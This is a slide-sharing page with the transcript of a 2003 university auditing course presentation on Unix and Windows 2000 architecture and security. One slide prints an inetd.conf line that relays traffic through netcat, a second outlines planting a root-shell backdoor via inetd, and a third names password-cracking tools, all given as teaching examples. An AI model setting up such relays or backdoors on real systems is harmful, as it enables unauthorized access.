Overview of unix
Download
1 / 14

Overview of Unix - PowerPoint PPT Presentation


  • 250 Views
  • Updated On :

Overview of Unix. Jagdish S. Gangolly School of Business State University of New York at Albany

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Overview of Unix' - richard_edik


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Overview of unix l.jpg

Overview of Unix

Jagdish S. Gangolly

School of Business

State University of New York at Albany

NOTE: These notes are based on the book Counter Hack, by Ed Skoudis and are prepared solely for the students in the course Acc 661 at SUNY Albany. They are not to be used by others without the permission of the instructor.

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Overview of unix2 l.jpg
Overview of Unix

  • Architecture

    • File System Structure

    • Kernel and processes

    • Account groups

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Architecture file system structure l.jpg
Architecture: File System Structure

  • Hierarchical

    /

    Bin dev etc home lib mnt proc tmp usr var

    passwd group bin man sbin

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Architecture kernel processes i l.jpg
Architecture: Kernel & Processes I

  • CPU can run at most one program at a time

  • Kernel schedules processes, allocates and manages memory, and prevents one process from accessing memory belonging to other processes

  • Daemons (background processes) perform print spooling, network services, file-sharing, web access, remote management capabilities, etc.

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Architecture kernel processes ii l.jpg
Architecture: Kernel & Processes II

  • Automatically starting processes:

    • Init: parent of all user-level processes (/etc/init.d)

      • Httpd (port 80), Sendmail (port 25), NFS

    • Inetd (/etc/inetd.conf)

      • Echo, Chargen, FTPd, Telnetd, Shell, login, TFTP

    • Cron

  • Vulnerability:

    • Use of inetd.conf to create attack relays

      11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc [next_hop] 54321

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Architecture kernel processes iii l.jpg
Architecture: Kernel & Processes III

  • Vulnerability: Create a backdoor using Inetd

    • Overflow a buffer in a program running with root level privileges

    • Run a shell command to insert a line into the inetd.conf file (the line sets up a high order tcp port, running as root a command shell to execute any commands received)

    • Killall command sends an HUP signal to Inetd process, making it reread the configuration file

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Accounts and groups l.jpg
Accounts and Groups

  • /etc/passwd

    • Login name, encrypted/hashed password, UID number, default GID number, GECOS information, home directory, login shell

    • Vulnerability: Password attacks

      • Guessing, login scripts, L0phtCrack (win), John the Ripper

  • /etc/group

  • Unix permissions

  • SetUID

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Miscellaneous l.jpg
Miscellaneous

  • Unix trust

    • /etc/hosts.equiv

    • .rhosts

    • R-commands

      • rlogin, rsh, rcp, …

      • Vulnerable to IP-spoofing

  • Logs and auditing

    • /var/log/secure

    • /var/log/messages

    • /var/log/httpd, /var/log/cron,…

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Miscellaneous9 l.jpg
Miscellaneous

  • utmp – who

  • wtmp – last

  • lastlog – time of user’s last login

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Windows 2000 l.jpg
Windows 2000

  • Domains: share authentication database

    • Primary Domain Controller (PDC)

    • Backup Domain Controller (BDC)

    • SAM database

  • Shares: remote connections to network devices

  • Service packs and hotfixes

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Windows 2000 architecture l.jpg
Windows 2000: Architecture

  • User Mode

  • Kernel Mode

    • Executive Subsystems

    • Hardware Abstraction Layer

  • Accounts and groups

    • Default accounts (Administrator, Guest)

    • Created by administrator

    • Groups: Global and local

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Windows 2000 architecture ii l.jpg
Windows 2000: Architecture II

  • Privileges: Administrators, users, guests

    • Rights: things users can do that can be added or revoked

    • Abilities: built-in capabilities of groups that can not be altered

  • Policies:

    • Account policy

    • User properties settings

  • Trust: No trust, Complete trust, Master domain, Multiple master domain

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Windows 2000 architecture iii l.jpg
Windows 2000: Architecture III

  • Auditing

    • System Logging

    • Security Logging: logons/logoffs, files/object access, use of rights,…

    • Application Logging

  • Object access control and permissions

    • Ownership

    • NTFS permissions: No access, Read, Change, Full control

    • Share permissions

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


Windows 2000 architecture iii14 l.jpg
Windows 2000: Architecture III

Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly


ad